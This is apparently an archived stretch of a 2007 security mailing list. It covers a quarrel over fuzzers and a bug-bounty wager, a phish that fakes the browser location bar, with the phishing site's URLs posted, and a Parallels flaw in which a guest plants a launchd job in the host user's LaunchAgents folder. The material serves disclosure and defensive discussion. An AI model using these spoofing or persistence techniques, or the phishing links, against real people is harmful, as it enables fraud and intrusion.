References: <20070210204144.GA20960@codenomicon.com> <1df0a410702111006j149cc5c5w18d8d00f6ce1204a@mail.gmail.com>
Message-ID: <006c01c74ec0$2fb88e20$0202fea9@ad.priorityhealth.com>

> 2. A lot of people are "finding" things simply by being the first to aim someone else's fuzzer at them.
> I'm not sure what this implies, but it implies something.

Ooh, maybe it implies that the art of finding software vulnerabilities is ready for some big consultancy to turn it into a canned 2-week deliverable.
Experienced coders will be replaced by a couple of CSAs with Spike and Peach and only 3 semesters of C++ between them. Perhaps eventually it will get to a point where Qualys builds a product where you upload your .MSI file to a VM and they just e-mail you a report.

Or maybe it just means that as fuzzers get better, KF will have to announce a QOAB or a YOAB. :-)

PaulM

From krpatasec at gmail.com Mon Feb 12 14:16:23 2007
From: krpatasec at gmail.com (Tyler Krpata)
Date: Mon, 12 Feb 2007 14:16:23 -0500
Subject: [Dailydave] Interesting phish
Message-ID: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com>

I had an interesting Bank of America phish pointed out to me... it gets around the "wrong URL" problem by popping up a new window which disables the location bar and creates a lookalike IE location bar of its own which contains a legit URL. This is something I had actually been thinking about and played with a bit about a year ago, so I'm not hugely surprised to see it in the wild. (Apologies if this is not a new tactic, but I hadn't seen it before.)

Not sure if it's kosher to post phishing URLs to the list, but I will if anyone wants to see it.

From olef.anderson at gmail.com Mon Feb 12 16:11:55 2007
From: olef.anderson at gmail.com (Olef Anderson)
Date: Mon, 12 Feb 2007 13:11:55 -0800
Subject: [Dailydave] Some Sums
In-Reply-To: <20070210204144.GA20960@codenomicon.com>
References: <20070210204144.GA20960@codenomicon.com>
Message-ID: <9b4f936f0702121311pe313c28wa289096db651731a@mail.gmail.com>

> company, and refuse to disclose flaws in commercial software (and our
> customers appreciate this). We are not in the blackmailing
> business... Open source would be free target though (my personal
> opinion, not our company opinion). Thirdly, we do not build exploits
> like Dave already pointed out earlier, again for ethical reasons (and
> because nobody has ever asked us to develop exploits for the found
> flaws even if building the exploit would be easy).
> And last note, we
> would have no use nor interest for your exploit, nor would we want to
> even see it due to the related liability issues.

Blackmailing business? Where did you come up with that? There is a difference between not wanting to offer any free services to Microsoft and blackmailing it. If you can't tell the difference between the two, you really don't understand much about the nuances of the field you are trying to get some traction from. However you are always quick to respond to Dave's emails regarding Canvas/Spike etc. and inserting your worthless commercial rhetoric, so I am for a change offering you to do it like a man. So can you handle that, or will you keep being the half-assed corporate mouthpiece?

> So I am sorry I have to decline the offer. You are free to continue
> hunting for your fame and glory from the remote exploits. I wish you
> good luck in the hunt! And I will shut up about our products as I
> definitely do not even want you to get these tools in your hand. ;)

Trust me, I would not have any use for your tool. Like many of your contemporaries, your product is one big blunder and yet another silly excuse to launch a security company. Also if I was after any fame and glory, don't you think I wouldn't settle for the silly credit in Microsoft advisories like many of eEye's foreign imports? I (like any other researcher with enough years of experience under his/her belt) am solely interested in the financial gain; pay me my hourly rate and I don't care if you act like you don't even know me, that's just fine.

> I hope you had a chance to visit us at RSA! We are constantly looking
> for skilled people who wish to start doing more proactive work in
> security.

Proactive work? ahaha now that's just crazy funny!

Olef.
> On Thu, Feb 08, 2007 at 01:22:02PM -0500, dailydave-request at lists.immunitysec.com wrote:
> > Date: Thu, 8 Feb 2007 09:48:36 -0800
> > From: "Olef Anderson"
> > Subject: Re: [Dailydave] Some Sums
> > To: dailydave at lists.immunitysec.com
> >
> > About this whole fuzzer business, how about putting some cold hard cash where the corporate mouthpiece is at? Since obviously you happen to have some VC money, a booth at the RSA floor is a sign, you can back your claims with real currency. I would love to give you the opportunity.
> >
> > Let's take the latest Microsoft Exchange release (2007) and 2 weeks of your time running your PROTOS fuzzer. At the end of the 2 weeks if you can find the existing remote root hole in it, I am offering to pay you the bug's worth of $150 000.00. However if you are not successful, I should be paid the very same amount, which in return I shall present you the exploit. From that point you will be free to coordinate vendors, release advisories, whatever it takes. Just to clarify a point though, no DoSes are acceptable, should be an overflow that leads to clear code execution (the mailing list subscribers could be the judge of that).
> >
> > Wouldn't that be nice to prove that you actually know what you are talking about?
> >
> > On 2/7/07, Ari Takanen wrote:
> > >
> > > Hmmm, distantly related to this: Maybe us fuzzer developers should save hashes of some millions of attacks somewhere also, so that we can prove our tools were used to find the flaws in the first place... Looking at past iDefence disclosures for example, I am beginning to doubt that they reward for publishing flaws instead of finding flaws (this is like patent system in Europe which rewards first to file, not first to invent)... More and more flaws are found using tools, and pre-packaged attacks.
> > > If a flaw is found using a product like Codenomicon/PROTOS or CANVAS, I suppose the reward should also be paid to the tool developer and not the tool user. ;)
> > >
> > > Tongue-in-the-cheek-greetings,
> > >
> > > /Ari
>
> --
> -o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-
> Ari Takanen                      Codenomicon Ltd.
> ari.takanen at codenomicon.com     Tutkijantie 4E
> tel: +358-40 50 67678            FIN-90570 Oulu
> http://www.codenomicon.com       Finland
> PGP: http://www.codenomicon.com/codenomicon-key.asc
> -o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-

From fyodor at insecure.org Mon Feb 12 16:13:30 2007
From: fyodor at insecure.org (Fyodor)
Date: Mon, 12 Feb 2007 13:13:30 -0800
Subject: [Dailydave] Interesting phish
In-Reply-To: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com>
References: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com>
Message-ID: <20070212211330.GC14756@syn.lnxnet.net>

On Mon, Feb 12, 2007 at 02:16:23PM -0500, Tyler Krpata wrote:
> I had an interesting Bank of America phish pointed out to me...it gets
> around the "wrong URL" problem by popping up a new window which
> disables the location bar and creates a lookalike IE location bar of
> its own which contains a legit URL. This is something I had actually

IMHO, pages should not be able to hide your location bar, titlebar, or menubar, prevent you from resizing/moving/scrolling windows, or anything of the sort. Firefox has for many years offered config options to protect you from all this. Unfortunately, some of them are still not enabled by default.
CERT has a good description here of the features (related to a similar spoofing exploit which used XUL):

http://www.kb.cert.org/vuls/id/262350

I don't know if IE offers this sort of protection. The release notes for IE7[1] at least note a way to prevent status bar spoofing (you need to enable this explicitly though) and they finally decided that web pages should not be able to secretly snarf all of the data in your clipboard.

Cheers,
Fyodor

[1] http://msdn2.microsoft.com/en-us/ie/aa740486.aspx

From druid at caughq.org Mon Feb 12 23:45:58 2007
From: druid at caughq.org (I)ruid)
Date: Mon, 12 Feb 2007 22:45:58 -0600
Subject: [Dailydave] Interesting phish
In-Reply-To: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com>
References: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com>
Message-ID: <1171341958.3762.3.camel@localhost>

On Mon, 2007-02-12 at 14:16 -0500, Tyler Krpata wrote:
> Not sure if it's kosher to post phishing URL's to the list, but I will
> if anyone wants to see it.

I'm not sure if it is either, but it's definitely kosher to post it here:

http://www.phishtank.com

They definitely want to see it.

--
I)ruid, C²ISSP
druid at caughq.org
http://druid.caughq.org

From krpatasec at gmail.com Tue Feb 13 08:41:46 2007
From: krpatasec at gmail.com (Tyler Krpata)
Date: Tue, 13 Feb 2007 08:41:46 -0500
Subject: [Dailydave] Interesting phish
In-Reply-To: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com>
References: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com>
Message-ID: <9d3431d0702130541m6fe72c31w794f2f5f18941371@mail.gmail.com>

Due to an overwhelming flood of requests to see the URL, here it is:

http://www.progonline.com/en/index.html (attempts to launch popup)
http://www.progonline.com/en/sys.php (direct link)

On 2/12/07, Tyler Krpata wrote:
> I had an interesting Bank of America phish pointed out to me...it gets
> around the "wrong URL" problem by popping up a new window which
> disables the location bar and creates a lookalike IE location bar of
> its own which contains a legit URL. This is something I had actually
> been thinking about and played with a bit about a year ago, so I'm not
> hugely surprised to see it in the wild. (Apologies if this is not a
> new tactic, but I hadn't seen it before.)
>
> Not sure if it's kosher to post phishing URL's to the list, but I will
> if anyone wants to see it.

From dave at immunityinc.com Wed Feb 14 17:37:23 2007
From: dave at immunityinc.com (Dave Aitel)
Date: Wed, 14 Feb 2007 17:37:23 -0500
Subject: [Dailydave] 0days are important
Message-ID: <45D38F23.90300@immunityinc.com>

An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070214/4b0fe30f/attachment.htm

From rmogull-dd at securosis.com Fri Feb 16 12:20:32 2007
From: rmogull-dd at securosis.com (Rich Mogull)
Date: Fri, 16 Feb 2007 10:20:32 -0700
Subject: [Dailydave] Minor Virtualization Vulnerability
In-Reply-To: <45D38F23.90300@immunityinc.com>
References: <45D38F23.90300@immunityinc.com>

Last week I accidentally discovered a vulnerability in default installations of Parallels that allows manipulation of the host operating system when it's OS X, leading to code execution. Parallels just changed their default options in the latest release to reduce the chances of this attack, but it's still possible if the user deliberately enables drag and drop throughout the entire file system.

Last Friday Brian Krebs emailed me when he noticed his entire host OS file system being shared with the guest OS (OS X host, Windows guest). According to the Parallels forums, this was a known issue. By default, Parallels Desktop for Mac enabled Drag and Drop for guest operating systems. This creates a file share called .psf, which allows complete access to the host with the user's current permissions level. But just dropping an application into /Applications doesn't allow execution; I didn't track down why, but I think only read and write were enabled.

After poking around I figured out that code execution, of a sort, is possible through manipulation of launchd (the OS X cron and other job replacement). My first attempt was to create a launchd job and place it into SystemDaemons, but that failed. There's no way to sudo between the guest and host, so even if you're an admin user, you can't hit certain directories. But I was able to create a job (just a plist file, xml) and drop it into the active user's LaunchAgents directory. Log out, log back in, and the job executes. Launchd is very flexible, allowing execution based on time or user events, and can include arguments.